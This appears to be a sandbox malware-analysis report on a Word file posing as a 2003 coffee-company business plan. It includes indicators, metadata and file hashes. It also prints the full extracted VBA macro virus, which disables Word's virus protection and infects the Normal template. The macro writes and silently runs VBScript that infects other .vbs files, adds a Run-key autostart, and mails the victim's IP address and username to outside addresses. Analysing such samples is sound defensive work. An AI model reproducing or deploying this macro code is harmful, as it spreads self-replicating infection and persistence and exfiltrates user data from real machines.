DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: prntvpt.dll/PTOpenProvider
DynamicLoader: prntvpt.dll/PTCloseProvider
DynamicLoader: prntvpt.dll/PTConvertDevModeToPrintTicket
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: prntvpt.dll/PTOpenProvider
DynamicLoader: prntvpt.dll/PTCloseProvider
DynamicLoader: prntvpt.dll/PTConvertDevModeToPrintTicket
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: comctl32.dll/
The office file contains a macro
The office file contains a macro with auto execution
AutoOpen: Runs when the Word document is opened
AutoClose: Runs when the Word document is closed
The office file contains anomalous features
creation_anomaly: The file appears to have an edit time yet has no creation time or last saved time. This can be a sign of an automated document creation kit.
Creates a hidden or system file
file: C:\Users\user\AppData\Local\Temp\~$psh5v7u_m.doc
The office file contains a macro with potential indicators of compromise
E-mail address: Print #1, If x = 1 Then EMADDY = avm@nym.alias.net Else EMADDY = nick@virusbtn.com
Executable file name: Shell wscript c:\happy.vbs, vbHide
Executable file name: If Dir(c:\A4.vbs) = Then
Executable file name: Open c:\A4.vbs For Output As 1
Executable file name: Print #1, IV7 = WSHShell.ExpandEnvironmentStrings(%windir%\avm.vbs)
Executable file name: Open c:\happy.vbs For Output As 1
Executable file name: Shell wscript c:\a4.vbs, vbHide
The office file contains a macro with suspicious strings
Chr: May attempt to obfuscate specific strings (use option --deobf to deobfuscate)
Open: May open a file
Shell: May run an executable file or a system command
vbHide: May run an executable file or a system command
Wscript_Shell: May run an executable file or a system command
Run: May run an executable file or a system command
Windows: May enumerate application windows (if combined with Shell.Application object)
CreateObject: May create an OLE object
VBProject: May attempt to modify the VBA code (self-modification)
VBComponents: May attempt to modify the VBA code (self-modification)
CodeModule: May attempt to modify the VBA code (self-modification)
AddFromString: May attempt to modify the VBA code (self-modification)
Write: May write to a file (if combined with Open)
Output: May write to a file (if combined with Open)
Print #: May write to a file (if combined with Open)
System: May run an executable file or a system command on a Mac (if combined with libc.dylib)
Attempts to interact with an Alternate Data Stream (ADS)
file: C:\Users\user\AppData\Local\Temp\Macintosh HD:Files:Company:coffeeconcept:Bus Plans:MS Plan Docs:Normal
file: C:\Users\user\AppData\Local\Temp\:Normal

Screenshots


Hosts

No hosts contacted.

DNS

No domains contacted.


Summary

SummaryInformation Metadata

Creating Application Microsoft Word 9.0
Author Patrick Feld
Last Saved By Mark Portrait
Creation Time None
Last Saved Time None
Total Edit Time 37620
Document Title Brain Coffee Co. Preliminary Business Plan
Document Subject December 2003
Amount of Pages 42
Amount of Words 14927
Amount of Characters 85085

DocumentSummaryInformation Metadata

Company Brain Coffee Co.
Document Version None
Digital Signature None
Language None
Notes None

File Analysis (Signatures)

IOCs
E-mail address Print #1, If x = 1 Then EMADDY = avm@nym.alias.net Else EMADDY = nick@virusbtn.com
Executable file name Shell wscript c:\happy.vbs, vbHide
Executable file name If Dir(c:\A4.vbs) = Then
Executable file name Open c:\A4.vbs For Output As 1
Executable file name Print #1, IV7 = WSHShell.ExpandEnvironmentStrings(%windir%\avm.vbs)
Executable file name Open c:\happy.vbs For Output As 1
Executable file name Shell wscript c:\a4.vbs, vbHide
Suspicious
Chr May attempt to obfuscate specific strings (use option --deobf to deobfuscate)
Open May open a file
Shell May run an executable file or a system command
vbHide May run an executable file or a system command
Wscript_Shell May run an executable file or a system command
Run May run an executable file or a system command
Windows May enumerate application windows (if combined with Shell.Application object)
CreateObject May create an OLE object
VBProject May attempt to modify the VBA code (self-modification)
VBComponents May attempt to modify the VBA code (self-modification)
CodeModule May attempt to modify the VBA code (self-modification)
AddFromString May attempt to modify the VBA code (self-modification)
Write May write to a file (if combined with Open)
Output May write to a file (if combined with Open)
Print # May write to a file (if combined with Open)
System May run an executable file or a system command on a Mac (if combined with libc.dylib)
AutoExec
AutoOpen Runs when the Word document is opened
AutoClose Runs when the Word document is closed

Extracted Macros

VBA Filename ThisDocument.cls Extracted Macro
Sub AutoOpen()
'AVM
On Error Resume Next
Dim DC, IT As Integer
Application.EnableCancelKey = 0
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Options.ConfirmConversions = 0
a = ActiveDocument.Saved
If Right(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1), 3) <> "AVM" Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString ("Sub AutoClose()" & vbCr & ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines - 1))
End If
If Right(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1), 3) <> "AVM" Then
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromString ("Sub AutoOpen()" & vbCr & NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines - 1))
If Left(ActiveDocument.Name, 8) <> "Document" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
IT = (Day(Now))
DC = System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0", "AVM-DC")
If DC = "" Or DC < IT Then
GoOk = True
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0", "AVM-DC") = IT
End If
TestCon = System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0", "AVM-VBS")
If System.PrivateProfileString("", "HKEY_CLASSES_ROOT\VBSFile\ScriptEngine", "") = "VBScript" Then SIY = True
If SIY = True And TestCon <> "Done" Then
Open "c:\happy.vbs" For Output As 1
Print #1, "'\xa4"
Print #1, ""
Print #1, "On Error Resume Next"
Print #1, "Dim IV6, U187, IV7, IV1, IV2, IV3, IV4"
Print #1, "Dim T111"
Print #1, "Dim IV5(200)"
Print #1, "Dim XR"
Print #1, "Set WSHShell = Wscript.CreateObject(""Wscript.Shell"")"
Print #1, "Set WshSysEnv = WSHShell.Environment(""Process"")"
Print #1, "IV10 = WshSysEnv(""Path"")"
Print #1, "IV7 = WSHShell.ExpandEnvironmentStrings(""%windir%\avm.vbs"")"
Print #1, "IV1 = Wscript.ScriptFullName"
Print #1, "Set IV6 = CreateObject(""Scripting.FileSystemObject"")"
Print #1, "XR = 1"
Print #1, "T11 = Wscript.ScriptFullName"
Print #1, "For x = Len(IV10) To 1 Step -1"
Print #1, "IV4 = Mid(IV10, x, 1)"
Print #1, "If IV4 <> "";"" Then"
Print #1, "IV5(XR) = IV4 + IV5(XR)"
Print #1, "ElseIf IV4 = "";"" Then"
Print #1, "IV5(XR) = IV5(XR) + ""\"""
Print #1, "XR = XR + 1"
Print #1, "End If"
Print #1, "Next"
Print #1, "IV5(XR) = IV5(XR) + ""\"""
Print #1, "IV5(XR + 1) = WSHShell.SpecialFolders(""Desktop"") + ""\"""
Print #1, "IV5(XR + 2) = WSHShell.SpecialFolders(""MyDocuments"") + ""\"""
Print #1, "IV5(XR + 3) = WSHShell.SpecialFolders(""Startup"") + ""\"""
Print #1, "IV5(XR + 4) = Left(T11, InStrRev(T11, ""\""))"
Print #1, "Set TS = IV6.OpenTextFile(T11, 1)"
Print #1, "IV9 = TS.ReadAll"
Print #1, "TS.Close"
Print #1, "IV8 = Chr(167)"
Print #1, "endIV8 = ""'"" & IV8"
Print #1, "For x = Len(IV9) To 1 Step -1"
Print #1, "If Mid(IV9, x, 1) = IV8 Then"
Print #1, "x = 1"
Print #1, "IV3 = endIV8 + IV3"
Print #1, "ElseIf Mid(IV9, x, 1) <> IV8 Then"
Print #1, "IV3 = Mid(IV9, x, 1) + IV3"
Print #1, "End If"
Print #1, "Next"
Print #1, "For y = 1 To (XR + 4)"
Print #1, "For Each Target In IV6.GetFolder(IV5(y)).Files"
Print #1, "If UCase(Right(Target.Name, 3)) = ""VBS"" Then"
Print #1, "IV11 = """""
Print #1, "Set TS = IV6.OpenTextFile(IV5(y) & Target.Name, 1)"
Print #1, "IV11 = TS.ReadAll"
Print #1, "TS.Close"
Print #1, "If mid(IV11,(len(IV11)-2),1) <> ""\xb4"" Then"
Print #1, "Set TS = IV6.OpenTextFile(IV5(y) & Target.Name, 8)"
Print #1, "TS.Write IV3"
Print #1, "TS.Close"
Print #1, "End If"
Print #1, "End If"
Print #1, "Next"
Print #1, "Next"
Print #1, "FIV11 (IV7)"
Print #1, "If T111 = False Then"
Print #1, "WSHShell.RegWrite ""HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVM"", IV7"
Print #1, "Set U187 = IV6.OpenTextFile(IV7, 2, True)"
Print #1, "U187.Write IV3"
Print #1, "U187.Close"
Print #1, "End If"
Print #1, "Function FIV11(filespec)"
Print #1, "Set IV6 = CreateObject(""Scripting.FileSystemObject"")"
Print #1, "If (IV6.FileExists(filespec)) Then"
Print #1, "T111 = True"
Print #1, "Else"
Print #1, "T111 = False"
Print #1, "End If"
Print #1, "End Function"
Print #1, "' Nick ""The Love Monkey"" Virus Package by ALT-F4 and ALT-F11 for the Alternative Virus Mafia"
Print #1, "'\xb4"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0", "AVM-VBS") = "Done"
Close 1
Shell "wscript c:\happy.vbs", vbHide
End If
If SIY = True And GoOk = True Then
If Dir("c:\A4.vbs") = "" Then
Open "c:\A4.vbs" For Output As 1
Print #1, "Dim theApp, theNameSpace, theMailItem"
Print #1, "Dim IPSocket"
Print #1, "On Error Resume Next"
Print #1, "Set IPSocket = CreateObject(""MSWinsock.Winsock"")"
Print #1, "IPADDY = IPSocket.LocalIP"
Print #1, "set BOB = CreateObject(""Wscript.Network"")"
Print #1, "For x = 1 To 2"
Print #1, "If x = 1 Then EMADDY = ""avm@nym.alias.net"" Else EMADDY = ""nick@virusbtn.com"""
Print #1, "if x = 1 then MSGBDY = IPADDY else MSGBDY = ""Dear Nicky... my name is " & Application.UserName & " and I want to make hot monkey love with you. You anti-virus stud!"""
Print #1, "Set theApp = WScript.CreateObject(""Outlook.Application"")"
Print #1, "Set theNameSpace = theApp.GetNameSpace(""MAPI"")"
Print #1, "theNameSpace.Logon ""profile"", ""password"""
Print #1, "Set theMailItem = theApp.CreateItem(0)"
Print #1, "theMailItem.Recipients.Add EMADDY"
Print #1, "theMailItem.Subject = BOB.Username"
Print #1, "theMailItem.Body = MSGBDY"
Print #1, "theMailItem.Send"
Print #1, "theNameSpace.Logoff"
Print #1, "Next"
Close 1
End If
Shell "wscript c:\a4.vbs", vbHide
End If
If ActiveDocument.Saved <> a Then ActiveDocument.Saved = a
' Nick "The Love Monkey" Virus Package by ALT-F4 and ALT-F11 for the Alternative Virus Mafia
End Sub

Vba2Graph

This file is not on VirusTotal.

Process Tree


WINWORD.EXE, PID: 2360, Parent PID: 2900
Full Path: C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
Command Line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" "C:\Users\user\AppData\Local\Temp\tmpsh5v7u_m.doc" /q
splwow64.exe, PID: 2616, Parent PID: 2360
Full Path: C:\Windows\splwow64.exe
Command Line: C:\Windows\splwow64.exe 12288
explorer.exe, PID: 1708, Parent PID: 1660
Full Path: C:\Windows\explorer.exe
Command Line: C:\Windows\Explorer.EXE

Hosts

No hosts contacted.

TCP

No TCP connections recorded.

UDP

No UDP connections recorded.

DNS

No domains contacted.

HTTP Requests

No HTTP requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name CVR13FD.tmp.cvr
Associated Filenames
C:\Users\user\AppData\Local\Temp\CVR13FD.tmp.cvr
File Size 0 bytes
File Type empty
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
CRC32 00000000
Ssdeep 3::
ClamAV None
Yara None matched
CAPE Yara None matched
File name Normal.dotm
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm
File Size 20381 bytes
File Type Microsoft Word 2007+
MD5 23f4c984d111e7c0851f13b5a39e23bf
SHA1 f0b6cf9e53e9b5396275341984cb781ee9c52e80
SHA256 3ade1df494b161cd3616664ccf82d732eea6a648eefe4bfdc285c21be9e51966
CRC32 B554EAE8
Ssdeep 384:Pjl7/J/5ehBcSV+qEPG6yGUTBIOoX4+hD9Qn6eF7y1SFmlEeP:d/JQoG2vX4+hD9IZY
ClamAV None
Yara None matched
CAPE Yara None matched
File name ~$Normal.dotm
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
C:\Users\user\AppData\Local\Temp\~$psh5v7u_m.doc
File Size 162 bytes
File Type data
MD5 acb67bf7df8f0e7df75bac6b0e9643ec
SHA1 4869a0152f3ec1e97195c7f1fd33f11be2f6b888
SHA256 d8b1018a6ae8a96b457fb7303f6260419841fae1ef0daf17f31f05f6cfcaa637
CRC32 55E1A65B
Ssdeep 3:2H/9lyX/3L7YMlbK7g7lxItPFx8w/:wVSlxK7ghq9x
ClamAV None
Yara None matched
CAPE Yara None matched
File name ~WRC0000.tmp
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0000.tmp
C:\Users\user\AppData\Local\Temp\tmpsh5v7u_m.doc
File Size 4200960 bytes
File Type Composite Document File V2 Document, Little Endian, Os: MacOS, Version 10.3, Code page: 10000, Title: Brain Coffee Co. Preliminary Business Plan, Subject: December 2003, Author: Patrick Feld, Template: Normal, Last Saved By: Mark Portrait, Revision Number: 28, Name of Creating Application: Microsoft Word 9.0, Total Editing Time: 10:27:00, Create Time/Date: Thu Dec 11 04:58:00 2003, Last Saved Time/Date: Fri Dec 19 21:44:00 2003, Number of Pages: 42, Number of Words: 14927, Number of Characters: 85085, Security: 2
MD5 7cad33500a32cf4335f4553922650ef2
SHA1 fc1619f581f8fa976bf6ca42aa856818775ddbfe
SHA256 31cb9054db8cfa48e2bac12b291ef7581cc4b96a8d47d0167465f1fd16436fd5
CRC32 C3C994F9
Ssdeep 98304:blM+Qge+ZdqmvEReVpydCQMlM+Qge+Zdqm:ucZdqmRQCQNcZdqm
ClamAV None
Yara None matched
CAPE Yara None matched
File name MSForms.exd
Associated Filenames
C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
File Size 147284 bytes
File Type data
MD5 c998106d7982b3bf83f8767338fde072
SHA1 61e213178bf4a04445c3da5ab05c7d0e1903e1dc
SHA256 59487def3d54c8feecd434920f68427c77338be3db5df3a5a9766b372f613ad3
CRC32 6ADC14B5
Ssdeep 1536:CkILrFNSc8SetKB96vQVCjumVMOej6mXmYarrJQcd1FaLcmB:CDNNSc83tKBAvQVCGOtmXmLpLmB
ClamAV None
Yara None matched
CAPE Yara None matched
File name CUSTOM.DIC
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
File Size 2 bytes
File Type Little-endian UTF-16 Unicode text, with no line terminators
MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
CRC32 88F83096
Ssdeep 3:Qn:Qn
ClamAV None
Yara None matched
CAPE Yara None matched
File name ~WRS{AAE56046-81C2-4CBF-AC95-50CF5E34FDC4}.tmp
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AAE56046-81C2-4CBF-AC95-50CF5E34FDC4}.tmp
File Size 1024 bytes
File Type data
MD5 5d4d94ee7e06bbb0af9584119797b23a
SHA1 dbb111419c704f116efa8e72471dd83e86e49677
SHA256 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
CRC32 23C03491
Ssdeep 3:ol3lYdn:4Wn
ClamAV None
Yara None matched
CAPE Yara None matched
File name ~WRS{AF84AC22-0525-4E56-AB03-A36968EC6AE1}.tmp
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AF84AC22-0525-4E56-AB03-A36968EC6AE1}.tmp
File Size 1536 bytes
File Type data
MD5 4ce962ebc3c56aa351978993011edc52
SHA1 41d891d9f59e430d46c9ff564b1546e6e945b96b
SHA256 c4bb298bcd0e67c4eaae7c6e2c209bac961d24e2b904c26e59874a8d5b235592
CRC32 F9283CE9
Ssdeep 3:Iiiiiiiiii1Hlnl/bl//l/bll/vvvvvvvvvvFlIqsdHl3lldHzlblXllZrnlPlXi:Iiiiiiiiii1eJc8++VyHgoy/e+RoKQ
ClamAV None
Yara None matched
CAPE Yara None matched
File name ~WRS{A3B1DA1A-048D-441E-96AC-CAEF9DB6E4B9}.tmp
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A3B1DA1A-048D-441E-96AC-CAEF9DB6E4B9}.tmp
File Size 1536 bytes
File Type data
MD5 a47885c5dc3c4b73915fac5ff548a73c
SHA1 d6cd72c366a441cfc01a6249cab5fc688cb5aa5e
SHA256 d9ddf7c624b6485519588ef0c5811349d503b96d7a03b484cef7777a5999301a
CRC32 11E41B9E
Ssdeep 6:YmWmG2GW2GJjvm/v3WqyHOl3l3ltyWlBlGm4Fn:YXHH3cmXWOBTRK
ClamAV None
Yara None matched
CAPE Yara None matched
File name Word14.customUI
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Office\Word14.customUI
File Size 3513 bytes
File Type Microsoft OOXML
MD5 b022439244ee91625c99a91c666eb0fb
SHA1 84a647b0bc5457c74c631361e8fad1dadd0852c8
SHA256 2a439ab0ccf43f70f80f6b929f9ea29ac6a6666b9abce9921105dc72e7fda8ca
CRC32 CC7E186E
Ssdeep 48:9mV5NrJ54E1SO6xLfUMcZ0BIKoGn5FxwYzZX2ynWM2d8gy7znl:UV5RJ4xFOYtXl
ClamAV None
Yara None matched
CAPE Yara None matched
File name ~WRF{4F0C4843-9FB9-499D-87E8-922A36CB0A35}.tmp
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F0C4843-9FB9-499D-87E8-922A36CB0A35}.tmp
File Size 33280 bytes
File Type Composite Document File V2 Document, No summary info
MD5 00c61260952475fdf53b14dbac830ca3
SHA1 4b09a3cce0d6a3ef127da25f0e26b73b80d5c80c
SHA256 4f9015abd372a64bdcb2ab7a79bf701a1244639f25af15578d7b87aa0e23db6d
CRC32 F102D774
Ssdeep 768:l0eTiMtoDFCEHi0cE+2Vq2w2YW42iFV2H2W2f2g0dhKT5452Q2a+KQoh7SG8e11F:nmrHtnVVkQP
ClamAV None
Yara None matched
CAPE Yara None matched
Sorry! No CAPE files.
Sorry! No process dumps.

Comments



No comments posted

Processing ( 13.855 seconds )

  • 3.695 BehaviorAnalysis
  • 3.627 CAPE
  • 1.908 Dropped
  • 1.836 Static
  • 1.707 TargetInfo
  • 0.448 Strings
  • 0.416 Deduplicate
  • 0.204 TrID
  • 0.007 NetworkAnalysis
  • 0.005 AnalysisInfo
  • 0.002 Debug

Signatures ( 2.403 seconds )

  • 0.419 antidbg_windows
  • 0.356 antiav_detectreg
  • 0.146 stealth_timeout
  • 0.138 decoy_document
  • 0.123 infostealer_ftp
  • 0.109 api_spamming
  • 0.103 NewtWire Behavior
  • 0.075 antianalysis_detectreg
  • 0.068 infostealer_im
  • 0.065 antivm_generic_scsi
  • 0.038 mimics_filetime
  • 0.036 antivm_vbox_keys
  • 0.032 Doppelganging
  • 0.032 stealth_file
  • 0.026 antivm_generic_services
  • 0.025 antivm_vmware_keys
  • 0.023 antivm_vbox_window
  • 0.023 recon_fingerprint
  • 0.019 uac_bypass_eventvwr
  • 0.018 bootkit
  • 0.018 kibex_behavior
  • 0.018 antisandbox_script_timer
  • 0.018 antivm_xen_keys
  • 0.018 darkcomet_regkeys
  • 0.017 antivm_generic_disk
  • 0.017 persistence_autorun
  • 0.017 antivm_parallels_keys
  • 0.015 betabot_behavior
  • 0.013 recon_programs
  • 0.013 virus
  • 0.013 geodo_banking_trojan
  • 0.012 antivm_generic_diskreg
  • 0.012 antivm_vpc_keys
  • 0.011 antiav_detectfile
  • 0.01 malicious_dynamic_function_loading
  • 0.01 antiemu_wine_func
  • 0.01 dynamic_function_loading
  • 0.01 ransomware_files
  • 0.009 InjectionCreateRemoteThread
  • 0.008 injection_createremotethread
